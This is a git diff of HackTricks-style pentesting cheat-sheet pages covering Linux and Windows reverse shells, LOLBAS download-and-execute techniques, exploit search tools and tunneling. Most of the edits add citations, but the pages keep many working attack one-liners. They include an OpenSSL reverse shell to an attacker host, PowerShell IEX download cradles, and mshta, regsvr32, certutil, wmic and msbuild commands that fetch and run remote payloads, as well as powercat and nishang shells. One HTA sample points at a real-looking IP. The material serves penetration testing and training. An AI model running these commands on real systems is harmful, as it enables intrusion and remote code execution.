+This section uses OpenSSL's `req`, `s_server`, and `s_client` commands to create a certificate and carry a shell over TLS.<sup>[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 The Attacker (Kali)
 
@@ -357,7 +358,7 @@ mkfifo /tmp/.s; /bin/sh -i </tmp/.s 2>&1 | openssl s_client -quiet -connect <ATT
 mkfifo /tmp/.s; /bin/sh -i </tmp/.s 2>&1 | openssl s_client -quiet -servername <DOMAIN> -verify_return_error -verify_hostname <DOMAIN> -connect <ATTACKER_IP>:<PORT> >/tmp/.s; rm /tmp/.s
 ```
 
-You can still use the classic **two-listener** pattern when you want separated input/output channels:
+You can still use the classic **two-listener** pattern when you want separated input/output channels.<sup>[[16]](#references)[[17]](#references)</sup>
 
 ```bash
 #Linux
@@ -399,7 +400,7 @@ awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s;
 while true; do nc -l 79; done
 ```
 
-To send the command write it down, press enter and press CTRL+D (to stop STDIN)<sup>[[3]](#references)</sup>
+To send the command write it down, press enter and press CTRL+D (to stop STDIN).<sup>[[3]](#references)</sup>
 
 **Victim**
 
@@ -436,13 +437,13 @@ BEGIN {
 
 ## Xterm
 
-This will try to connect to your system at port 6001:
+This will try to connect to your system at port 6001.<sup>[[2]](#references)</sup>
 
 ```bash
 xterm -display 10.0.0.1:1
 ```
 
-To catch the reverse shell you can use (which will listen in port 6001):
+To catch the reverse shell, use an X server listening on port 6001 as shown below.<sup>[[2]](#references)</sup>
 
 ```bash
 # Authorize host
@@ -453,7 +454,7 @@ Xnest :1
 
 ## Groovy
 
-by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
+by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76). NOTE: Java reverse shell also work for Groovy.<sup>[[18]](#references)</sup>
 
 ```bash
 String host="localhost";
@@ -472,5 +473,16 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
 - [6] [revsh - A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities](https://github.com/emptymonkey/revsh)
 - [7] [pwncat (pwncat-cs) - post-exploitation platform](https://github.com/calebstewart/pwncat)
 - [8] [busybox | GTFOBins](https://gtfobins.org/gtfobins/busybox/)
+- [9] [explainshell.com](https://explainshell.com/)
+- [10] [Bash Reference Manual: Redirections](https://www.gnu.org/s/bash/manual/html_node/Redirections.html)
+- [11] [Bash Reference Manual: Invoking Bash](https://www.gnu.org/software/bash/manual/html_node/Invoking-Bash.html)
+- [12] [toboggan](https://github.com/n3rada/toboggan)
+- [13] [forward-shell](https://github.com/IppSec/forward-shell)
+- [14] [Global Socket deployment instructions](https://www.gsocket.io/deploy/)
+- [15] [openssl-req](https://docs.openssl.org/4.0/man1/openssl-req/)
+- [16] [openssl-s_server](https://docs.openssl.org/master/man1/openssl-s_server/)
+- [17] [openssl-s_client](https://docs.openssl.org/master/man1/openssl-s_client/)
+- [18] [Pure Groovy/Java Reverse Shell](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
+- [19] [BusyBox](https://busybox.net/about.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/generic-hacking/reverse-shells/windows.md
+++ b/src/generic-hacking/reverse-shells/windows.md
@@ -1,11 +1,11 @@
 # Shells - Windows
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Lolbas
 
-The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\
-Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.**
+The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows, just as [https://gtfobins.github.io/](https://gtfobins.github.io/) is for Linux.<sup>[[13]](#references)[[14]](#references)</sup>
+Windows uses access tokens and privileges for process security, and Windows 11 also includes an optional `sudo` command.<sup>[[11]](#references)[[12]](#references)</sup> It is useful to know **how** some **binaries** can be (ab)used to perform unexpected actions such as **executing arbitrary code**.<sup>[[13]](#references)</sup>
+
+The baseline Windows reverse-shell payloads collected below are also documented in the HighOn.Coffee and PayloadsAllTheThings cheat sheets; adjust paths and installed interpreters for the target.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ## NC
 
@@ -33,7 +33,7 @@ ncat -l <PORT eg.443> --ssl
 
 ## SBD
 
-**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for Netcat.
+**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for Netcat.<sup>[[15]](#references)</sup>
 
 ```bash
 # Victims machine
@@ -104,14 +104,14 @@ echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/Power
 ```
 
 Process performing network call: **powershell.exe**\
-Payload written on disk: **NO** (_at least nowhere I could find using procmon !_)
+Payload written on disk: **NO** (_at least nowhere I could find using procmon !_).<sup>[[5]](#references)</sup>
 
 ```bash
 powershell -exec bypass -f \\webdavserver\folder\payload.ps1
 ```
 
 Process performing network call: **svchost.exe**\
-Payload written on disk: **WebDAV client local cache**
+Payload written on disk: **WebDAV client local cache**.<sup>[[5]](#references)</sup>
 
 **One liner:**
 
@@ -123,7 +123,7 @@ $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $c
 
 ## Mshta
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```bash
 mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
@@ -143,11 +143,11 @@ mshta \\webdavserver\folder\payload.hta
  <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
 ```
 
-**You can download & execute very easily a Koadic zombie using the stager hta**<sup>[[3]](#references)</sup>
+**You can download & execute very easily a Koadic zombie using the stager hta**.<sup>[[3]](#references)</sup>
 
 #### hta example
 
-[**From here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)<sup>[[7]](#references)</sup>
+[**From here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f).<sup>[[7]](#references)</sup>
 
 ```xml
 <html>
@@ -166,7 +166,7 @@ mshta \\webdavserver\folder\payload.hta
 
 #### **mshta - sct**
 
-[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)<sup>[[8]](#references)</sup>
+[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17).<sup>[[8]](#references)</sup>
 
 ```xml
 <?XML version="1.0"?>
@@ -203,7 +203,7 @@ Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given
 
 [**Dll hello world example**](https://github.com/carterjones/hello-world-dll)
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```bash
 rundll32 \\webdavserver\folder\payload.dll,entrypoint
@@ -217,22 +217,7 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http
 
 **Rundll32 - sct**
 
-[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)<sup>[[8]](#references)</sup>
-
-```xml
-<?XML version="1.0"?>
-<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
-<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
-<scriptlet>
-<public>
-</public>
-<script language="JScript">
-<![CDATA[
-    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
-]]>
-</script>
-</scriptlet>
-```
+Reuse the scriptlet shown in the [mshta - sct](#mshta-sct) section; its leading comment contains the corresponding `rundll32.exe` launcher.<sup>[[8]](#references)</sup>
 
 #### **Rundll32 - Metasploit**
 
@@ -255,7 +240,7 @@ rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject(
 
 ## Regsvr32
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```bash
 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
@@ -283,13 +268,13 @@ Besides loading remote scriptlets (`scrobj.dll`), `regsvr32.exe` will load a loc
     -RunLevel Highest
   ```
 
-See also: ClickFix clipboard‑to‑PowerShell variant that stages a JS loader and later persists with `regsvr32`.
+See also: ClickFix clipboard‑to‑PowerShell variant that stages a JS loader and later persists with `regsvr32`.<sup>[[6]](#references)</sup>
 {{#ref}}
 ../../generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
 {{#endref}}
 
 
-[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)<sup>[[9]](#references)</sup>
+[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1).<sup>[[9]](#references)</sup>
 
 ```html
 <?XML version="1.0"?>
@@ -319,19 +304,19 @@ run
 #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
 ```
 
-**You can download & execute very easily a Koadic zombie using the stager regsvr**<sup>[[3]](#references)</sup>
+**You can download & execute very easily a Koadic zombie using the stager regsvr**.<sup>[[3]](#references)</sup>
 
 ## Certutil
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
-Download a B64dll, decode it and execute it.
+Download a B64dll, decode it and execute it.<sup>[[5]](#references)</sup>
 
 ```bash
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
 ```
 
-Download a B64exe, decode it and execute it.
+Download a B64exe, decode it and execute it.<sup>[[5]](#references)</sup>
 
 ```bash
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
@@ -360,7 +345,7 @@ msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > sh
 ```
 
 Process performing network call: **svchost.exe**\
-Payload written on disk: **WebDAV client local cache**
+Payload written on disk: **WebDAV client local cache**.<sup>[[5]](#references)</sup>
 
 ```bash
 msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
@@ -392,13 +377,13 @@ victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
 
 ## **Wmic**
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```bash
 wmic os get /format:"https://webserver/payload.xsl"
 ```
 
-Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):<sup>[[10]](#references)</sup>
+Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7).<sup>[[10]](#references)</sup>
 
 ```xml
 <?xml version='1.0'?>
@@ -414,18 +399,18 @@ Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d
 
 **Not detected**
 
-**You can download & execute very easily a Koadic zombie using the stager wmic**<sup>[[3]](#references)</sup>
+**You can download & execute very easily a Koadic zombie using the stager wmic**.<sup>[[3]](#references)</sup>
 
 ## Msbuild
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```
 cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
 ```
 
-You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.\
-Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
+This project documents MSBuildShell as a PowerShell host that can bypass application whitelisting and `powershell.exe` restrictions and provide a PowerShell-like shell.<sup>[[16]](#references)</sup>\
+Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj).<sup>[[16]](#references)</sup>
 
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
@@ -435,7 +420,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
 
 ## **CSC**
 
-Compile C# code in the victim machine.
+Compile C# code in the victim machine.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ```
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
@@ -447,7 +432,7 @@ You can download a basic C# reverse shell from here: [https://gist.github.com/Ba
 
 ## **Regasm/Regsvc**
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
@@ -455,11 +440,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\fol
 
 **I haven't tried it**
 
-[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)<sup>[[2]](#references)</sup>
+[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182).<sup>[[2]](#references)</sup>
 
 ## Odbcconf
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)<sup>[[5]](#references)</sup>
+- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/).<sup>[[5]](#references)</sup>
 
 ```bash
 odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
@@ -467,7 +452,7 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 
 **I haven't tried it**
 
-[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)<sup>[[2]](#references)</sup>
+[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2).<sup>[[2]](#references)</sup>
 
 ## Powershell Shells
 
@@ -475,13 +460,13 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 
 [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
 
-In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script and append to the end of the file:
+In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script and append to the end of the file:<sup>[[19]](#references)</sup>
 
 ```
 Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
 ```
 
-Start serving the script in a web server and execute it on the victim's end:
+Start serving the script in a web server and execute it on the victim's end:<sup>[[19]](#references)[[20]](#references)[[21]](#references)</sup>
 
 ```
 powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
@@ -495,7 +480,7 @@ Defender doesn't detect it as malicious code (yet, 3/04/2019).
 
 [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
 
-Download, start a web server, start the listener, and execute it on the victim's end:
+Download, start a web server, start the listener, and execute it on the victim's end:<sup>[[22]](#references)</sup>
 
 ```
  powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
@@ -505,7 +490,7 @@ Defender doesn't detect it as malicious code (yet, 3/04/2019).
 
 **Other options offered by powercat:**
 
-Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
+Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...<sup>[[22]](#references)</sup>
 
 ```
 Serve a cmd Shell:
@@ -528,7 +513,7 @@ Start A Persistent Server That Serves a File:
 
 [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
 
-Create a powershell launcher, save it in a file and download and execute it.
+Create a powershell launcher, save it in a file and download and execute it.<sup>[[23]](#references)[[26]](#references)[[27]](#references)</sup>
 
 ```
 powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
@@ -540,19 +525,19 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 
 
 [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
 
-Create a powershell version of metasploit backdoor using unicorn
+Create a powershell version of metasploit backdoor using unicorn.<sup>[[24]](#references)</sup>
 
 ```
 python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
 ```
 
-Start msfconsole with the created resource:
+Start msfconsole with the created resource:<sup>[[24]](#references)</sup>
 
 ```
 msfconsole -r unicorn.rc
 ```
 
-Start a web server serving the _powershell_attack.txt_ file and execute in the victim:
+Start a web server serving the _powershell_attack.txt_ file and execute in the victim:<sup>[[24]](#references)</sup>
 
 ```
 powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
@@ -564,7 +549,7 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
 
 [PS>Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded (cyphered)\
 [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
-WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX)
+WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX).<sup>[[25]](#references)</sup>
 
 ## References
 
@@ -578,5 +563,22 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
 - [8] [scriptlet.sct – mshta/rundll32 scriptlet example (Arno0x gist)](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
 - [9] [regsvr32.sct – Regsvr32 scriptlet example (Arno0x gist)](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
 - [10] [wmic.xsl – WMIC XSL stylesheet example (Arno0x gist)](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7)
+- [11] [Access Tokens – Win32 apps (Microsoft Learn)](https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
+- [12] [Sudo for Windows (Microsoft Learn)](https://learn.microsoft.com/en-us/windows/advanced-settings/sudo/)
+- [13] [LOLBAS](https://lolbas-project.github.io/)
+- [14] [GTFOBins](https://gtfobins.github.io/)
+- [15] [sbd | Kali Linux Tools](https://www.kali.org/tools/sbd/)
+- [16] [MSBuildShell](https://github.com/Cn33liz/MSBuildShell)
+- [17] [Compiler Options – language feature rules (Microsoft Learn)](https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/language)
+- [18] [Compiler Options – output options (Microsoft Learn)](https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/output)
+- [19] [Nishang](https://github.com/samratashok/nishang)
+- [20] [Invoke-WebRequest (Microsoft Learn)](https://learn.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Utility/Invoke-WebRequest?view=powershell-5.1)
+- [21] [Invoke-Expression (Microsoft Learn)](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.5)
+- [22] [powercat](https://github.com/besimorhino/powercat)
+- [23] [Empire (archived repository)](https://github.com/EmpireProject/Empire)
+- [24] [Unicorn](https://github.com/trustedsec/unicorn)
+- [25] [WinPwn](https://github.com/SecureThisShit/WinPwn)
+- [26] [Empire Wiki](https://bc-security.gitbook.io/empire-wiki/)
+- [27] [multi_generate_agent | Empire Wiki](https://bc-security.gitbook.io/empire-wiki/stagers/multi_generate_agent)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/generic-hacking/search-exploits.md
+++ b/src/generic-hacking/search-exploits.md
@@ -1,7 +1,5 @@
 # Search Exploits
 
-{{#include ../banners/hacktricks-training.md}}
-
 ### Browser
 
 Always search in "google" or others: **\<service_name> \[version] exploit**
@@ -15,11 +13,11 @@ site:github.com/advisories "<product>" "<version>"
 site:cisa.gov/known-exploited-vulnerabilities-catalog "<product>"
 ```
 
-You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io/).
+You can also try Shodan's [vulnerability lookup service](https://exploits.shodan.io/), which currently redirects to its [CVEDB API](https://cvedb.shodan.io/).<sup>[[3]](#references)</sup>
 
 ### Searchsploit
 
-Useful to search exploits for services in **exploitdb from the console.**<sup>[[1]](#references)</sup>
+Useful for searching exploits in the local **Exploit-DB** archive from the console.<sup>[[1]](#references)</sup>
 
 ```bash
 # Searchsploit tricks
@@ -39,7 +37,7 @@ searchsploit -u # Update local exploitdb copy/package
 
 ### Pompem
 
-[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits
+[Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits and vulnerabilities across multiple databases.<sup>[[6]](#references)</sup>
 
 ### MSF-Search
 
@@ -51,36 +49,36 @@ msf> search name:openssh platform:unix type:exploit
 msf> info <module>
 ```
 
-The `search` command supports useful keywords such as `cve:`, `edb:`, `name:`, `platform:`, `ref:` and `type:`. After finding a candidate module, open it with `info` and check the module rank/check support before running it.
+The `search` command supports keywords such as `cve:`, `edb:`, `name:`, `platform:`, `port:`, `ref:`, `target:` and `type:`. After finding a candidate module, use `info` and verify its rank and whether it supports `check` before running it.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### PacketStorm
 
-If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com/)
+If nothing is found, try searching the used technology in [Packet Storm's archive](https://packetstormsecurity.com/).<sup>[[7]](#references)</sup>
 
 ### Vulners
 
-You can also search in vulners database: [https://vulners.com/](https://vulners.com/)
+You can also search the [Vulners database](https://vulners.com/).<sup>[[8]](#references)</sup>
 
-If you already have version data from enumeration, the maintained Vulners/Nmap integration is a very fast way to enrich banners and pivot into public exploit references:
+If you already have version data from enumeration, the Vulners/Nmap integration queries known vulnerabilities for Nmap-detected CPEs and supports minimum-CVSS filtering:<sup>[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 nmap -sV --script vulners --script-args mincvss=7.0 target
-nmap --script http-vulners-regex.nse --script-args 'paths={"/","/login"}' target
+nmap -sV --script http-vulners-regex.nse --script-args 'paths={"/","/login"}' target
 ```
 
-`http-vulners-regex` tries to recover CPEs from HTTP responses, which is useful when the plain banner is missing or too generic.
+The companion `http-vulners-regex` script scans HTTP responses, identifies software, and builds CPEs for identified versions so the main `vulners` script can query them.<sup>[[10]](#references)</sup>
 
 ### Sploitus
 
-This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com/)
+This searches for exploits in [Sploitus](https://sploitus.com/), a search engine for exploits and hacktools.<sup>[[11]](#references)</sup>
 
 ### Sploitify
 
-GTFOBins-like curated list of exploits with filters by vulnerability type (Local Privilege Escalation, Remote Code execution, etc), service type (Web, SMB, SSH, RDP, etc), OS and practice labs (links to machines where you can play with sploits): [https://sploitify.haxx.it](https://sploitify.haxx.it)
+[Sploitify](https://sploitify.haxx.it/) is an interactive, curated list of public server-side exploits with filters for vulnerability type (LPE, RCE, etc.), service (Web, SMB, RDP, SSH), OS, validation source (PoC, Nuclei, Metasploit), and practice tags such as Hack The Box.<sup>[[12]](#references)</sup>
 
 ### GitHub Advisory Database
 
-Very useful when the target is a package/library and not just a network service banner. It lets you search by **CVE**, **GHSA** or affected package/version:
+Useful when the target is a package/library rather than just a network service banner. The GitHub API lets you search global advisories by **CVE**, **GHSA**, ecosystem, or affected package/version:<sup>[[13]](#references)</sup>
 
 ```bash
 curl -s -H 'Accept: application/vnd.github+json' \
@@ -90,13 +88,13 @@ curl -s -H 'Accept: application/vnd.github+json' \
   'https://api.github.com/advisories?ecosystem=pip&affects=django@3.2.0' | jq '.[].ghsa_id'
 ```
 
-This is especially handy to pivot from a dependency name/version into advisories, then from the advisory into public PoCs and Metasploit/Nuclei coverage.
+Use the returned advisory metadata and references as a starting point for investigating related PoCs or scanner coverage.<sup>[[13]](#references)</sup>
 
 ### search_vulns
 
 `search_vulns` enables you to search for known vulnerabilities and exploits as well: [**https://search-vulns.com/**](https://search-vulns.com/).<sup>[[2]](#references)</sup>
 
-Compared with a plain keyword search, it is especially useful when you want to correlate **NVD + GHSA + Exploit-DB + PoC-in-GitHub + Metasploit + Nuclei + KEV/EOL data** from one query, or when a **CPE** is more reliable than the raw banner string.
+It can correlate **NVD + GHSA + Exploit-DB + PoC-in-GitHub + Metasploit + Nuclei + KEVIntel + endoflife.date** data from one query and accepts product titles, CPE 2.3 strings, or vulnerability IDs as input.<sup>[[2]](#references)</sup>
 
 ```bash
 search_vulns --update
@@ -110,5 +108,16 @@ search_vulns -q "nginx 1.18" --include-patched
 
 - [1] [SearchSploit Manual / Kali usage examples](https://www.kali.org/tools/exploitdb/)
 - [2] [search_vulns project](https://github.com/ra1nb0rn/search_vulns)
+- [3] [Shodan CVEDB API](https://cvedb.shodan.io/)
+- [4] [Metasploit Modules documentation](https://docs.rapid7.com/metasploit/modules)
+- [5] [Metasploit Framework module search command](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/lib/msf/ui/console/command_dispatcher/modules.rb)
+- [6] [Pompem](https://github.com/rfunix/Pompem)
+- [7] [Packet Storm Security](https://packetstormsecurity.com/)
+- [8] [Vulners](https://vulners.com/)
+- [9] [Nmap vulners NSE script documentation](https://nmap.org/nsedoc/scripts/vulners.html)
+- [10] [nmap-vulners](https://github.com/vulnersCom/nmap-vulners)
+- [11] [Sploitus](https://sploitus.com/)
+- [12] [Sploitify](https://sploitify.haxx.it/)
+- [13] [GitHub REST API: Global security advisories](https://docs.github.com/en/rest/security-advisories/global-advisories)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/generic-hacking/tunneling-and-port-forwarding.md
+++ b/src/generic-hacking/tunneling-and-port-forwarding.md
@@ -1,15 +1,15 @@
 # Tunneling and Port Forwarding
 
-{{#include ../banners/hacktricks-training.md}}
-
 ## Nmap tip
 
 > [!WARNING]
-> **ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work.
+> Nmap's proxy support is limited to TCP connections and does not affect ping, port, or OS-detection scans. When the scanner is behind a SOCKS proxy, **disable host discovery** (`-Pn`) and use a **TCP connect scan** (`-sT`).<sup>[[5]](#references)</sup>
 
 ## **Bash**
 
 **Host -> Jump -> InternalA -> InternalB**
+
+The final command uses Evil-WinRM's `-u` and `-i` options to identify the account and WinRM host; its default WinRM port is 5985.<sup>[[4]](#references)</sup>
 
 ```bash
 # On the jump server connect the port 3333 to the 5985
@@ -29,15 +29,21 @@ evil-winrm -u username -i Jump
 
 ## **SSH**
 
+OpenSSH can forward X11 connections, arbitrary TCP ports, and Unix-domain sockets over its encrypted channel.<sup>[[6]](#references)</sup>
+
 SSH graphical connection (X)
+
+`-Y` enables trusted X11 forwarding and `-C` requests compression for forwarded data.<sup>[[6]](#references)</sup>
